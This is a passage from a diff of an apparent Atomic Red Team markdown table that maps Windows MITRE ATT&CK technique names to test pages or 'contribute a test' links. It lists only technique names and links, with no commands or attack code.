TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | -| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Remote Access Software](../../T1219/T1219.md) | | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | -| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | -| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | -| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | -| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | -| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | -| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | -| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | -| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | -| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | -| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | -| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | -| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | -| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | -| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | -| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Windows Service](../../T1543.003/T1543.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | 